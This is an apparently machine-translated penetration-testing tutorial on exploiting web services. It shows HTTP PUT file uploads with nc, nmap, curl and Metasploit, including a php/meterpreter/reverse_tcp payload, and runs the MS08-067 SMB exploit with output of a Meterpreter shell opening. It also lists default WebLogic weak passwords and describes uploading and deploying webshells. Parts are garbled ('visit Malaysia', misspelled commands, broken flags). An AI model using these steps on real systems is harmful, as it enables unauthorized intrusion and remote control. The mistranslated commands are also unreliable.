Example Analysis of Web Vulnerability Exploitation Postures

1. Utilization of HTTP PUT method

PUT is a method used for file management. If the operation and maintenance personnel have not modified the default configuration of the web server and still support these methods, they can Upload files to the server file system at will.

1.1. Netcat uses the PUT method

Netcat is a very famous network tool, referred to as "NC", and is known as the "Swiss **" in penetration testing say. It can implement multiple functions such as port monitoring, port scanning, remote file transfer, and remote shell.

After checking that the Web service has enabled the PUT method, enter the following command to upload the file:

nc IP PORT

PUT /dav/hack.txt HTTP/1.1

Host: IP

Press Enter twice to see that the hacked.txt file has been successfully created, the status code is 201, and the file creation location is the /dav/ directory.

1.2. Nmap uses the PUT method

Command:

nmap -p port IP -script http-put-script-args http-put. url='/dav/test.php',http-put.file='/root/test.php'

Command explanation:

-script http-put //Select http- put script, the script supports uploading files using the http put method.

-script-args //Set script parameters 1 and 2

http-put.url='/dav/test.php' //Set parameter 1 as the upload target file path

http-put.file='/root/test.php' //Set parameter 2 to the upload local file path.

You can see in the picture that the upload through the Nmap script was successful.

1.3 BurpSuite uses the PUT method

Use the daily BurpSuite to access the upload target path to capture the data packet, modify the data packet request method and upload path, write the file content in the request body, and send the package to the web server.

The server response packet shows that the file was created successfully.

1.4 CURL uses the PUT method

CURL is a file transfer tool that uses URL syntax to work under the command line, uploading or downloading through the specified URL data and display the data. The c in curl means client, and URL is the URL.

The command to create a file through the PUT method is as follows:

Command 1:

curl -i -XPUT -H “Content-Type: text/plain ; charset=utf-8” -d “hack completed” http://192.168.40.4/dav/hack.php

##Command explanation:

-i/--include //Include protocol header information when output

-X/--request //Specify PUT command

-H/--header -d/--data //HTTP POST method writes text Created http://192.168.40.4/dav/hack.php

Command 2:

curl -i -X ​​PUT -H "Content-Type:application /xml; charset=utf-8″ -d @”F:\1.php” http://192.168.40.4/dav/hack.php

Command explanation ：

-d @"filename" //Read content from the file

##1.5 QuickPuT script uses the PUT method

Using QuickPut, a Python command line tool, we can upload files to the server using the HTTP PUT method.

Upload command:

python2 QuickPut.py F:\1.php http://192.168.40.4/dav/hack1.php

Command explanation:

python QuickPut.py

1.6 Metasploit uses the PUT method

Metasploit’s auxiliary module auxiliary/ scanner/http/http_put can implement file upload and delete operations.

Command:

Use http_put module for auxiliary scanning http service

show options //Display module parameters

set RHOSTS 192.168.40.4 //Set the target IP

set PATH /dav/ //Set the target path

set payload php/meterpreter/reverse_tcp //Set attack payload

set filename msf.php //Set upload file name

set FILEDATA file ://root/test.php //Set the data path for uploading local files

exploit //Start the attack

The return result shows that the file was successfully uploaded.

2. SMB vulnerability exploitation

After conducting information collection port scanning, it is found that the host has ports 139 and 445 open and the banner displays Microsoft Windows, which will be associated with 139 and 445 ports. Port 445 SMB vulnerabilities, the more common ones include ms17-010, ms08-067, etc.

Vulnerability Detection

Command:

namp --script=/usr/share/nmap/scripts/smb- vuln-ms08-067.nse –sTIP

namp --script=/usr/share/nmap/scripts/smb-vuln-ms17-010.nse –sTIP

Command Explanation:

--script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse //Use Nmapms08-067 vulnerability scanning script

-sT //Use TCP scanning

If the output result is:

smb-vuln-ms08-067:

VULNERABLE:

Microsoft Windows system vulnerable toremote code execution (MS08-067)

State: VULNERABLE

IDs: CVE: CVE-2008-4250

The Server service inMicrosoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,Vista Goldand SP1, Server 2008, and 7 Pre-Beta allows remote attackers to executearbitrarycode via a crafted RPC request that triggers the overflow during pathcanonicalization.

Disclosure date: 2008-10-23

References:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

https://cve.mitre.org /cgi-bin/cvename.cgi?name=CVE-2008-4250

indicates that the ms08-067 vulnerability exists, and ms17-010 is the same as above.

Exploiting the vulnerability

Use the MSF smb attack module to exploit the ms08-067 and ms17-010 vulnerabilities.

msf> use exploit/windows/smb/ms08_067_netapi

msfexploit(ms08_067_netapi) > set RHOST IP

msfexploit(ms08_067_netapi) > exploit

[*]Started reverse TCP handler on Local listening IP port

is automatically detecting the target IP: 445

[*]Target IP: 445- Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:English

[*]Target IP:445- Selected Target: Windows 2000 Universal

[*]Target IP:445- Attempting to trigger the vulnerability...

[*]Sending stage (957487 bytes) to target IP

[*]Meterpreter session 2 opened (monitoring IP port-> target port bounce)

meterpreter>

ms17-010 exploit same as above.

3.Weblogic vulnerability exploitation

In penetration testing, we often encounter Weblogic Server application servers. After seeing Weblogic Server, we think that Weblogic Server may have background management. Weak passwords, JAVA deserialization vulnerabilities, arbitrary file upload vulnerabilities, and many other CVE vulnerabilities in this version. Let’s share how to exploit various vulnerabilities in Weblogic.

3.1 Backend login weak password

Common Weblogic Server login weak password:

weblogic/weblogic

weblogic/weblogic1

weblogic/weblogic10

weblogic/weblogic123

If it exists, you can log in to the application server management background and upload the webshellwar package.

Deploy the war package in the application server after uploading

After successfully uploading and deploying the war package, you can visit Malaysia.

##3.2 JAVADeserialization Vulnerability

CVE vulnerabilities can be directly detected using scripts, and then the exploit script can be found based on the vulnerability code.

Weblogic vulnerability detection script is very powerful and can detect various CVEs, management background paths, SSRF, weak passwords, and supports later expansion.

You can also use Java deserialization vulnerability exploitation tools to directly detect and exploit. The vulnerability tool provides vulnerability detection, command execution, file upload, and batch inspection functions.

3.3 Weblogic Arbitrary file upload vulnerability

Return information by blasting Weblogic.

Obtain the login password, service name, and random character directory, and construct and upload the POC to upload the test file.

Pass in the following data under the /bea_wls_deployment_internal/DeploymentService path

The server returns the upload success and the absolute path of the file.

Display the content of the uploaded file after accessing this uploaded file path

http://IP/bea_wls_deployment_internal/shell.jsp

The above is the detailed content of Example Analysis of Web Vulnerability Exploitation Postures. For more information, please follow other related articles on the PHP Chinese website!